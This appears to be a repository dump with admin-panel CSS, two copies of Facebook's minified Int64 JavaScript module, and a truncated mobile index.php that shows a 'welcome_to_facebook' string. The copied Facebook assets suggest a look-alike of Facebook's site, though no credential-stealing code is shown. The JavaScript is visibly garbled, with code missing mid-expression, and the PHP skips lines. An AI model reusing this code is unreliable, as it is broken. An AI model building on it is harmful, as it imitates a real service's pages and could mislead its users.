26 | a:hover { color:#8d341f; text-decoration: none;}
27 |
28 | .left, .alignleft { float:left; display:inline; }
29 | .right, .alignright { float:right; display:inline; }
30 |
31 | .cl { font-size:0; line-height:0; clear:both; display:block; height:0; }
32 |
33 | .al { text-align: left; }
34 | .ar { text-align: right; }
35 | .ac { text-align: center !important; }
36 |
37 | h1{ font-size:22px; line-height:24px; color:#fff; font-weight: normal;}
38 | h1 a{ color:#fff; text-decoration: none; }
39 | h2 { font-size:15px; font-weight: normal; }
40 | h3 { font-size:12px; line-height:14px; font-weight: normal; }
41 | h3 a{ text-decoration: none; }
42 |
43 |
44 |
45 | .shell { width:988px; margin:0 auto; }
46 |
47 | #header { height:89px; white-space:nowrap; }
48 | #header h1{ float:left; display:inline; padding-top:12px; }
49 | #top-navigation { float:right; white-space:nowrap; color:#fff; padding-top:15px; }
50 | #top-navigation a{ color:#fff; }
51 | #top-navigation span{ color:#dca598; }
52 | #top { height:53px; }
53 |
54 | #navigation { height:36px;}
55 | #navigation ul{ list-style-type: none;}
56 | #navigation ul li{ float:left; display:inline; margin-right:2px;}
57 | #navigation ul li a,
58 | #navigation ul li a span { float:left; height:36px; background:url(images/tab.gif) no-repeat 0 0; padding:0 0 0 15px;}
59 | #navigation ul li a span { background-position:right 0; padding:0 15px 0 0;}
60 | #navigation ul li a { line-height:36px; color:#907525; text-decoration: none; }
61 |
62 | #navigation ul li a.active,
63 | #navigation ul li a:hover { background-position:0 bottom;}
64 |
65 | #navigation ul li a.active span,
66 | #navigation ul li a:hover span{ background-position:right bottom;}
67 |
68 | #navigation ul li a.active { font-size:12px; font-weight: bold; color:#887e42; }
69 |
70 |
71 | #container { padding:20px 0;}
72 |
73 | .small-nav { color:#978b48; padding-bottom:20px; }
74 | .small-nav a{ color:#6f6636; }
75 |
76 |
77 | #main {}
78 | #content { float:left; width:100%; }
79 | #sidebar { float:right; width:225px; }
80 |
81 |
82 | .table {}
83 | .table th{ background:#fffdfa url(images/th.gif) repeat-x 0 0; color:#818181; text-align: left; padding:7px 10px; border-bottom:solid 1px #d2d1cb;}
84 | .table td{ background:#fbfcfc; border-bottom:solid 1px #e0e0e0; padding:8px 10px; }
85 | .table tr.odd td{ background:#f8f8f8; }
86 | .table tr:hover td{ background:#fff9e1; }
87 | .table a.ico{ }
88 |
89 | .box { background:#fbfcfc; height:100%; padding:1px; margin-bottom:20px; }
90 | .box-head { background:#0050a3; height:32px; color:#fff; padding: 0 10px; line-height:32px; white-space:nowrap; border-bottom:solid 1px #fff; }
91 | .box-head .right{ padding-top:5px; line-height:13px;}
92 | .box-head .right label,
93 | .box-head .right input { float:left; }
94 | .box-head .right label { padding:4px 0 0 0;}
95 | .box-head .right input { margin-left:5px;}
96 |
97 | .pagging { height:20px; padding:8px 10px; line-height:19px; color:#949494; }
98 | .pagging a{ background:url(images/pagging.gif) repeat-x 0 0; height:20px; float:left; padding:0 8px; border:solid 1px #d5d5d5; text-decoration: none; color:#949494; margin-left:5px; }
99 | .pagging a:hover { border-color:#8c3521; background:#ba4c32; color:#fff; }
100 | .pagging span{ float:left; margin-left:5px; padding-top:2px; }
101 |
102 |
103 | a.ico { color:#9d9c9a; font-size:10px; text-decoration: none; padding:0 0 0 14px; background-repeat:no-repeat; background-position:0 0; }
104 | a.ico:hover { color:#333;}
105 | a.del { background-image:url(images/del.gif)}
106 | a.edit { background-image:url(images/edit.gif); margin-left:14px;}
107 |
108 |
109 | .form { padding:15px 10px 5px 10px; }
110 | .form label{ display:block; font-weight: bold; font-size:13px; padding-bottom:4px; }
111 | .form label span{ color:#999; font-weight: normal;}
112 | .form .field { display:block; }
113 | .form .inline-field .field { display:inline;}
114 | .form .req { font-size:13px; float:right; white-space:nowrap; color:#999; }
115 | .form p{ padding-bottom:15px; }
116 |
117 | .size1 { width:716px; }
118 | .size4 { width:99%; }
119 | .size2 { width:80px; }
120 | .size3 { width:120px; }
121 | textarea.size1 { height:180px; }
122 |
123 | .buttons { text-align: right; padding:10px; background:#eee; border-top:solid 1px #e0e0e0; }
124 | .buttons2 { padding:10px; background:#eee; border-top:solid 1px #e0e0e0; }
125 | .buttons .button{ margin-left:3px;}
126 |
127 | .box-content { padding:10px; }
128 |
129 | .sort { border-top:solid 1px #e0e0e0; padding-top:10px; margin-top:15px; }
130 | .sort label{ display:block; font-weight: bold;}
131 | .sort .field{ display:block; margin-top:5px; }
132 | .sort select.field{ width:203px; }
133 |
134 |
135 | .box-content p { padding-top:10px; }
136 | .select-all{}
137 | .select-all label{ text-decoration: underline; padding-left:4px; }
138 |
139 | .add-button,
140 | .add-button span { float:left; height:26px; background:url(images/add-button.gif) no-repeat 0 0; padding:0 0 0 28px; }
141 | .add-button span { background-position:right 0; padding:0 10px 0 0; }
142 | .add-button { font-weight: bold; font-size:12px; color:#747474; text-decoration: none; line-height:26px; }
143 | .add-button:hover { color:#333;}
144 |
145 |
146 | #footer { height:44px; background:url(images/footer.gif); line-height:44px; color:#fff;}
147 | #footer a{ color:#fff; }
148 |
149 |
150 | .msg { position:relative; padding-right:35px; margin-bottom:10px; }
151 | .msg p{ padding:9px 10px 9px 40px; font-size:12px; background-repeat:no-repeat; background-position:10px 5px;}
152 | .msg a.close{ font-size:0; line-height:0; position:absolute; top:0; right:0; width:34px; height:34px; background:url(images/close.gif); text-indent: -4000px;}
153 |
154 | .msg-ok p{ background-color:#fffac2; border:solid 1px #dbd6a2; color:#5e5c40; background-image:url(images/msg-ok.gif); }
155 | .msg-error p{ background-color:#f3c598; border:solid 1px #e8b084; color:#ba4c32; background-image:url(images/msg-error.gif); }
156 |
157 | /*** CSS3 ***/
158 | .box { -moz-border-radius:5px; -webkit-border-radius:5px; -moz-box-shadow: 0 0 6px #978f6c; -webkit-box-shadow: 0 0 6px #978f6c;}
159 | .box-head { -moz-border-radius-topleft:5px; -moz-border-radius-topright:5px; -webkit-border-top-left-radius:5px; -webkit-border-top-right-radius:5px; }
160 |
161 | .field, .button { -moz-border-radius:4px; -webkit-border-radius:4px; }
162 | .small-field, .button, .pagging a { -moz-border-radius:3px; -webkit-border-radius:3px; }
163 |
164 | .msg p { -moz-border-radius:6px; -webkit-border-radius:6px; }
165 |
166 | .button { -moz-box-shadow: 0 0 2px #978f6c; -webkit-box-shadow: 0 0 2px #978f6c;}
--------------------------------------------------------------------------------
/dynamic/mia/SN6qBmEx4ek.js:
--------------------------------------------------------------------------------
1 | if (self.CavalryLogger) { CavalryLogger.start_js(["ccpBO"]); }
2 |
3 | /**
4 | * @providesModule Int64
5 | * @preserve-header
6 | * @nolint
7 | * @nopackage
8 | */__d("Int64",[],(function a(b,c,d,e,f,g){c.__markCompiled&&c.__markCompiled();Int64=function(h,i){this.low_=h;this.high_=i;};Int64.IntCache_={};Int64.fromInt=function(h){if(-128<=h&&h<128){var i=Int64.IntCache_[h];if(i)return i;}var j=new Int64(h|0,h<0?-1:0);if(-128<=h&&h<128)Int64.IntCache_[h]=j;return j;};Int64.fromNumber=function(h){if(isNaN(h)||!isFinite(h)){return Int64.ZERO;}else if(h<=-Int64.TWO_PWR_63_DBL_){return Int64.MIN_VALUE;}else if(h+1>=Int64.TWO_PWR_63_DBL_){return Int64.MAX_VALUE;}else if(h<0){return Int64.fromNumber(-h).negate();}else return new Int64((h%Int64.TWO_PWR_32_DBL_)|0,(h/Int64.TWO_PWR_32_DBL_)|0);};Int64.fromBits=function(h,i){return new Int64(h,i);};Int64.fromString=function(h,i){if(h.length==0)throw Error('number format error: empty string');var j=i||10;if(j<2||36
=0)throw Error('number format error: interior "-" character: '+h);var k=Int64.fromNumber(Math.pow(j,8)),l=Int64.ZERO;for(var m=0;m>i)&1;i-=1;}i=31;for(var j=0;j<32;j++){h[j]=(this.high_>>i)&1;i-=1;}return h.join('');};Int64.prototype.toString=function(h){var i=h||10;if(i<2||36=0)?this.low_:Int64.TWO_PWR_32_DBL_+this.low_;};Int64.prototype.getNumBitsAbs=function(){if(this.isNegative()){if(this.equals(Int64.MIN_VALUE)){return 64;}else return this.negate().getNumBitsAbs();}else{var h=this.high_!=0?this.high_:this.low_;for(var i=31;i>0;i--)if((h&(1<0;};Int64.prototype.greaterThanOrEqual=function(h){return this.compare(h)>=0;};Int64.prototype.compare=function(h){if(this.equals(h))return 0;var i=this.isNegative(),j=h.isNegative();if(i&&!j)return -1;if(!i&&j)return 1;if(this.subtract(h).isNegative()){return -1;}else return 1;};Int64.prototype.negate=function(){if(this.equals(Int64.MIN_VALUE)){return Int64.MIN_VALUE;}else return this.not().add(Int64.ONE);};Int64.prototype.add=function(h){var i=this.high_>>>16,j=this.high_&65535,k=this.low_>>>16,l=this.low_&65535,m=h.high_>>>16,n=h.high_&65535,o=h.low_>>>16,p=h.low_&65535,q=0,r=0,s=0,t=0;t+=l+p;s+=t>>>16;t&=65535;s+=k+o;r+=s>>>16;s&=65535;r+=j+n;q+=r>>>16;r&=65535;q+=i+m;q&=65535;return Int64.fromBits((s<<16)|t,(q<<16)|r);};Int64.prototype.subtract=function(h){return this.add(h.negate());};Int64.prototype.multiply=function(h){if(this.isZero()){return Int64.ZERO;}else if(h.isZero())return Int64.ZERO;if(this.equals(Int64.MIN_VALUE)){return h.isOdd()?Int64.MIN_VALUE:Int64.ZERO;}else if(h.equals(Int64.MIN_VALUE))return this.isOdd()?Int64.MIN_VALUE:Int64.ZERO;if(this.isNegative()){if(h.isNegative()){return this.negate().multiply(h.negate());}else return this.negate().multiply(h).negate();}else if(h.isNegative())return this.multiply(h.negate()).negate();if(this.lessThan(Int64.TWO_PWR_24_)&&h.lessThan(Int64.TWO_PWR_24_))return Int64.fromNumber(this.toNumber()*h.toNumber());var i=this.high_>>>16,j=this.high_&65535,k=this.low_>>>16,l=this.low_&65535,m=h.high_>>>16,n=h.high_&65535,o=h.low_>>>16,p=h.low_&65535,q=0,r=0,s=0,t=0;t+=l*p;s+=t>>>16;t&=65535;s+=k*p;r+=s>>>16;s&=65535;s+=l*o;r+=s>>>16;s&=65535;r+=j*p;q+=r>>>16;r&=65535;r+=k*o;q+=r>>>16;r&=65535;r+=l*n;q+=r>>>16;r&=65535;q+=i*p+j*o+k*n+l*m;q&=65535;return Int64.fromBits((s<<16)|t,(q<<16)|r);};Int64.prototype.div=function(h){if(h.isZero()){throw Error('division by zero');}else if(this.isZero())return Int64.ZERO;if(this.equals(Int64.MIN_VALUE)){if(h.equals(Int64.ONE)||h.equals(Int64.NEG_ONE)){return Int64.MIN_VALUE;}else if(h.equals(Int64.MIN_VALUE)){return Int64.ONE;}else{var i=this.shiftRight(1),j=i.div(h).shiftLeft(1);if(j.equals(Int64.ZERO)){return h.isNegative()?Int64.ONE:Int64.NEG_ONE;}else{var k=this.subtract(h.multiply(j)),l=j.add(k.div(h));return l;}}}else if(h.equals(Int64.MIN_VALUE))return Int64.ZERO;if(this.isNegative()){if(h.isNegative()){return this.negate().div(h.negate());}else return this.negate().div(h).negate();}else if(h.isNegative())return this.div(h.negate()).negate();var m=Int64.ZERO,k=this;while(k.greaterThanOrEqual(h)){var j=Math.max(1,Math.floor(k.toNumber()/h.toNumber())),n=Math.ceil(Math.log(j)/Math.LN2),o=(n<=48)?1:Math.pow(2,n-48),p=Int64.fromNumber(j),q=p.multiply(h);while(q.isNegative()||q.greaterThan(k)){j-=o;p=Int64.fromNumber(j);q=p.multiply(h);}if(p.isZero())p=Int64.ONE;m=m.add(p);k=k.subtract(q);}return m;};Int64.prototype.modulo=function(h){return this.subtract(this.div(h).multiply(h));};Int64.prototype.not=function(){return Int64.fromBits(~this.low_,~this.high_);};Int64.prototype.and=function(h){return Int64.fromBits(this.low_&h.low_,this.high_&h.high_);};Int64.prototype.or=function(h){return Int64.fromBits(this.low_|h.low_,this.high_|h.high_);};Int64.prototype.xor=function(h){return Int64.fromBits(this.low_^h.low_,this.high_^h.high_);};Int64.prototype.shiftLeft=function(h){h&=63;if(h==0){return this;}else{var i=this.low_;if(h<32){var j=this.high_;return Int64.fromBits(i<>>(32-h)));}else return Int64.fromBits(0,i<<(h-32));}};Int64.prototype.shiftRight=function(h){h&=63;if(h==0){return this;}else{var i=this.high_;if(h<32){var j=this.low_;return Int64.fromBits((j>>>h)|(i<<(32-h)),i>>h);}else return Int64.fromBits(i>>(h-32),i>=0?0:-1);}};Int64.prototype.shiftRightUnsigned=function(h){h&=63;if(h==0){return this;}else{var i=this.high_;if(h<32){var j=this.low_;return Int64.fromBits((j>>>h)|(i<<(32-h)),i>>>h);}else if(h==32){return Int64.fromBits(i,0);}else return Int64.fromBits(i>>>(h-32),0);}};f.exports=Int64;}),null);
--------------------------------------------------------------------------------
/dynamic/profile_files/SN6qBmEx4ek.js:
--------------------------------------------------------------------------------
1 | if (self.CavalryLogger) { CavalryLogger.start_js(["ccpBO"]); }
2 |
3 | /**
4 | * @providesModule Int64
5 | * @preserve-header
6 | * @nolint
7 | * @nopackage
8 | */__d("Int64",[],(function a(b,c,d,e,f,g){c.__markCompiled&&c.__markCompiled();Int64=function(h,i){this.low_=h;this.high_=i;};Int64.IntCache_={};Int64.fromInt=function(h){if(-128<=h&&h<128){var i=Int64.IntCache_[h];if(i)return i;}var j=new Int64(h|0,h<0?-1:0);if(-128<=h&&h<128)Int64.IntCache_[h]=j;return j;};Int64.fromNumber=function(h){if(isNaN(h)||!isFinite(h)){return Int64.ZERO;}else if(h<=-Int64.TWO_PWR_63_DBL_){return Int64.MIN_VALUE;}else if(h+1>=Int64.TWO_PWR_63_DBL_){return Int64.MAX_VALUE;}else if(h<0){return Int64.fromNumber(-h).negate();}else return new Int64((h%Int64.TWO_PWR_32_DBL_)|0,(h/Int64.TWO_PWR_32_DBL_)|0);};Int64.fromBits=function(h,i){return new Int64(h,i);};Int64.fromString=function(h,i){if(h.length==0)throw Error('number format error: empty string');var j=i||10;if(j<2||36=0)throw Error('number format error: interior "-" character: '+h);var k=Int64.fromNumber(Math.pow(j,8)),l=Int64.ZERO;for(var m=0;m>i)&1;i-=1;}i=31;for(var j=0;j<32;j++){h[j]=(this.high_>>i)&1;i-=1;}return h.join('');};Int64.prototype.toString=function(h){var i=h||10;if(i<2||36=0)?this.low_:Int64.TWO_PWR_32_DBL_+this.low_;};Int64.prototype.getNumBitsAbs=function(){if(this.isNegative()){if(this.equals(Int64.MIN_VALUE)){return 64;}else return this.negate().getNumBitsAbs();}else{var h=this.high_!=0?this.high_:this.low_;for(var i=31;i>0;i--)if((h&(1<0;};Int64.prototype.greaterThanOrEqual=function(h){return this.compare(h)>=0;};Int64.prototype.compare=function(h){if(this.equals(h))return 0;var i=this.isNegative(),j=h.isNegative();if(i&&!j)return -1;if(!i&&j)return 1;if(this.subtract(h).isNegative()){return -1;}else return 1;};Int64.prototype.negate=function(){if(this.equals(Int64.MIN_VALUE)){return Int64.MIN_VALUE;}else return this.not().add(Int64.ONE);};Int64.prototype.add=function(h){var i=this.high_>>>16,j=this.high_&65535,k=this.low_>>>16,l=this.low_&65535,m=h.high_>>>16,n=h.high_&65535,o=h.low_>>>16,p=h.low_&65535,q=0,r=0,s=0,t=0;t+=l+p;s+=t>>>16;t&=65535;s+=k+o;r+=s>>>16;s&=65535;r+=j+n;q+=r>>>16;r&=65535;q+=i+m;q&=65535;return Int64.fromBits((s<<16)|t,(q<<16)|r);};Int64.prototype.subtract=function(h){return this.add(h.negate());};Int64.prototype.multiply=function(h){if(this.isZero()){return Int64.ZERO;}else if(h.isZero())return Int64.ZERO;if(this.equals(Int64.MIN_VALUE)){return h.isOdd()?Int64.MIN_VALUE:Int64.ZERO;}else if(h.equals(Int64.MIN_VALUE))return this.isOdd()?Int64.MIN_VALUE:Int64.ZERO;if(this.isNegative()){if(h.isNegative()){return this.negate().multiply(h.negate());}else return this.negate().multiply(h).negate();}else if(h.isNegative())return this.multiply(h.negate()).negate();if(this.lessThan(Int64.TWO_PWR_24_)&&h.lessThan(Int64.TWO_PWR_24_))return Int64.fromNumber(this.toNumber()*h.toNumber());var i=this.high_>>>16,j=this.high_&65535,k=this.low_>>>16,l=this.low_&65535,m=h.high_>>>16,n=h.high_&65535,o=h.low_>>>16,p=h.low_&65535,q=0,r=0,s=0,t=0;t+=l*p;s+=t>>>16;t&=65535;s+=k*p;r+=s>>>16;s&=65535;s+=l*o;r+=s>>>16;s&=65535;r+=j*p;q+=r>>>16;r&=65535;r+=k*o;q+=r>>>16;r&=65535;r+=l*n;q+=r>>>16;r&=65535;q+=i*p+j*o+k*n+l*m;q&=65535;return Int64.fromBits((s<<16)|t,(q<<16)|r);};Int64.prototype.div=function(h){if(h.isZero()){throw Error('division by zero');}else if(this.isZero())return Int64.ZERO;if(this.equals(Int64.MIN_VALUE)){if(h.equals(Int64.ONE)||h.equals(Int64.NEG_ONE)){return Int64.MIN_VALUE;}else if(h.equals(Int64.MIN_VALUE)){return Int64.ONE;}else{var i=this.shiftRight(1),j=i.div(h).shiftLeft(1);if(j.equals(Int64.ZERO)){return h.isNegative()?Int64.ONE:Int64.NEG_ONE;}else{var k=this.subtract(h.multiply(j)),l=j.add(k.div(h));return l;}}}else if(h.equals(Int64.MIN_VALUE))return Int64.ZERO;if(this.isNegative()){if(h.isNegative()){return this.negate().div(h.negate());}else return this.negate().div(h).negate();}else if(h.isNegative())return this.div(h.negate()).negate();var m=Int64.ZERO,k=this;while(k.greaterThanOrEqual(h)){var j=Math.max(1,Math.floor(k.toNumber()/h.toNumber())),n=Math.ceil(Math.log(j)/Math.LN2),o=(n<=48)?1:Math.pow(2,n-48),p=Int64.fromNumber(j),q=p.multiply(h);while(q.isNegative()||q.greaterThan(k)){j-=o;p=Int64.fromNumber(j);q=p.multiply(h);}if(p.isZero())p=Int64.ONE;m=m.add(p);k=k.subtract(q);}return m;};Int64.prototype.modulo=function(h){return this.subtract(this.div(h).multiply(h));};Int64.prototype.not=function(){return Int64.fromBits(~this.low_,~this.high_);};Int64.prototype.and=function(h){return Int64.fromBits(this.low_&h.low_,this.high_&h.high_);};Int64.prototype.or=function(h){return Int64.fromBits(this.low_|h.low_,this.high_|h.high_);};Int64.prototype.xor=function(h){return Int64.fromBits(this.low_^h.low_,this.high_^h.high_);};Int64.prototype.shiftLeft=function(h){h&=63;if(h==0){return this;}else{var i=this.low_;if(h<32){var j=this.high_;return Int64.fromBits(i<>>(32-h)));}else return Int64.fromBits(0,i<<(h-32));}};Int64.prototype.shiftRight=function(h){h&=63;if(h==0){return this;}else{var i=this.high_;if(h<32){var j=this.low_;return Int64.fromBits((j>>>h)|(i<<(32-h)),i>>h);}else return Int64.fromBits(i>>(h-32),i>=0?0:-1);}};Int64.prototype.shiftRightUnsigned=function(h){h&=63;if(h==0){return this;}else{var i=this.high_;if(h<32){var j=this.low_;return Int64.fromBits((j>>>h)|(i<<(32-h)),i>>>h);}else if(h==32){return Int64.fromBits(i,0);}else return Int64.fromBits(i>>>(h-32),0);}};f.exports=Int64;}),null);
--------------------------------------------------------------------------------
/m/index.php:
--------------------------------------------------------------------------------
1 | error_disable();
6 | ?>
7 |
8 |
9 |
10 |
11 | translater("welcome_to_facebook"); ?>
--------------------------------------------------------------------------------